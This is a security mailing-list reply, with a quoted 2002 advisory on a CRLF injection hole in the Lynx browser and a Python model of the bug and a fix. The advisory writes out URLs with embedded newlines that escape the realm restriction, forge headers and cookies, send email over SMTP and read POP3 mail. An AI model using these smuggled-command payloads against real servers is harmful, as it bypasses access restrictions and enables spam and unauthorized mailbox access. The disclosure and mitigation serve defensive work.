The same bug seems to affect the links browser. I have tested it with version 0.96. Links is another console browser with extended capabilities not supported by lynx, like frames, colors and menus.

On Thursday 22 August 2002 19:32, Ulf Harnhammar wrote:
> Lynx CRLF Injection, part two
>
>
> This is a follow-up to my "Lynx CRLF Injection" post a few days
> ago.
>
>
> * Lynx has got a realm feature that restricts users from accessing
> any host apart from the host of its start page. That is, if you
> start Lynx with "lynx -realm http://www.site1.st/", you are not
> allowed to go to http://www.site2.st/ .
>
> The CRLF Injection security hole allows users to break out of
> realms - the command:
>
> $ lynx -realm "http://www.site1.st/ HTTP/1.0
> Host: www.site2.st
>
> "
>
> will show site2.st, despite the fact that it is outside of the realm.
>
>
> * It allows users to send arbitrary cookies, user agents and
> referers to a web server - even if you're using a restrictions option
> saying that you're not allowed to change user agent:
>
> $ lynx -restrictions=useragent "http://www.site1.st/ HTTP/1.0
> User-Agent: Ulf 0.0
> Referer: http://www.metaur.nu/
> Cookie: user=ulf
>
> "
>
>
> * It is also possible to use this hole for communication with other
> types of servers than HTTP servers. You can send e-mails with it, for
> example - even if you're using a restrictions option saying that
> you're not allowed to send e-mails:
>
> $ lynx -restrictions=mail "http://mail.site1.st:587/ HTTP/1.0
> HELO my.own.site
> MAIL FROM: <my.own@mail.address>
> RCPT TO: <info@site1.st>
> DATA
> From: my.own@mail.address
> To: info@site1.st
> Subject: This is..
>
> This is a URL that sends an e-mail (?).
> .
> QUIT
>
> "
>
> You have to use port 587, as Lynx blocks port 25.
>
> The MTA will complain about the "GET / HTTP/1.0" string, but it
> still works.
>
>
> * You can even use this hole for reading e-mails from a POP3 server:
>
> $ lynx "http://mail.site1.st:110/ HTTP/1.0
> USER ulf
> PASS xxxx
> LIST
> RETR 1
> QUIT
>
> "
>
> The POP3 server will also complain about the "GET / HTTP/1.0"
> string, but it still works with this technology as well.
>
>
> * As previously noted, the holes listed above mostly affect programs
> that start Lynx, interactively or not, with a URL wholly or partially
> under the user's control.
>
>
> * The patch for this hole has moved to:
> ftp://lynx.isc.org/lynx/lynx2.8.4/patches/lynx2.8.4rel.1c.patch
>
>
> // Ulf Harnhammar
> ulfh@update.uu.se
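The mechanism behind every item in the quoted post is the same: the client splices the URL's path straight into the request line, so a CR or LF inside the URL ends the request line early and everything after it is read by the server as further lines. The following Python model is an added example, not code from the post and not Lynx's own code. It assumes a minimal client that builds "GET path HTTP/1.0" from a naive URL split (an assumption about the vulnerable behaviour, not Lynx's real parser), a lenient server that accepts bare LF as a line terminator, and a prefix check standing in for -realm. The hardened builder percent-encodes the path and rejects hosts with anything but hostname characters; that is one mitigation chosen for illustration and is not claimed to match the lynx2.8.4rel.1c patch linked above. The payloads are constructed from the realm-escape and (shortened) SMTP examples in the post.

```python
import re
from urllib.parse import quote

CRLF = "\r\n"


def split_url(url):
    """Minimal 'http://host[:port]/path' splitter with no validation
    (assumption about the vulnerable client, not Lynx's real URL parser)."""
    rest = url.split("://", 1)[1]
    hostport, _, path = rest.partition("/")
    host, _, port = hostport.partition(":")
    return host, int(port or 80), "/" + path


def build_request_naive(url):
    """Splice host and path straight into the request, as the post's examples imply."""
    host, _, path = split_url(url)
    return f"GET {path} HTTP/1.0{CRLF}Host: {host}{CRLF}{CRLF}".encode()


def build_request_safe(url):
    """Hardened variant (an example mitigation, not the real Lynx patch):
    percent-encode the path so CR, LF and space cannot end the request line,
    and refuse a host containing anything but hostname characters."""
    host, _, path = split_url(url)
    if not re.fullmatch(r"[A-Za-z0-9.-]+", host):
        raise ValueError(f"bad host: {host!r}")
    path = quote(path, safe="/?=&")
    return f"GET {path} HTTP/1.0{CRLF}Host: {host}{CRLF}{CRLF}".encode()


def server_lines(raw):
    """Lines a lenient line-oriented server (HTTP, SMTP, POP3) reads from the bytes;
    bare LF is accepted as a terminator, which is what the injection relies on."""
    return re.split(r"\r?\n", raw.decode("latin-1"))


def http_view(raw):
    """Request line plus headers up to the first blank line, as an HTTP server sees it."""
    lines = server_lines(raw)
    headers = {}
    for line in lines[1:]:
        if line == "":
            break
        name, _, value = line.partition(":")
        headers[name.strip()] = value.strip()
    return lines[0], headers


def in_realm(url, realm):
    """String-prefix check standing in for the -realm restriction (assumption)."""
    return url.startswith(realm)


# Constructed payload: the realm-escape URL from the post.
REALM = "http://www.site1.st/"
ESCAPE_URL = "http://www.site1.st/ HTTP/1.0\nHost: www.site2.st\n\n"
# Constructed payload: a shortened form of the post's SMTP example on port 587.
SMTP_URL = ("http://mail.site1.st:587/ HTTP/1.0\nHELO my.own.site\n"
            "MAIL FROM: <my.own@mail.address>\nRCPT TO: <info@site1.st>\nQUIT\n\n")

if __name__ == "__main__":
    print("realm check passes:", in_realm(ESCAPE_URL, REALM))
    print("naive server view :", http_view(build_request_naive(ESCAPE_URL)))
    print("safe server view  :", http_view(build_request_safe(ESCAPE_URL)))
    for line in server_lines(build_request_naive(SMTP_URL))[:5]:
        print("MTA reads:", repr(line))
```

Running it shows the realm prefix check passing on the string while the server parses a Host header of www.site2.st, which is exactly the gap the post describes; with the encoding builder the server sees one long, harmless request path and a Host of www.site1.st. The SMTP case prints "GET / HTTP/1.0" as the first line the MTA reads (the line the post says it complains about) followed by the injected HELO and envelope commands.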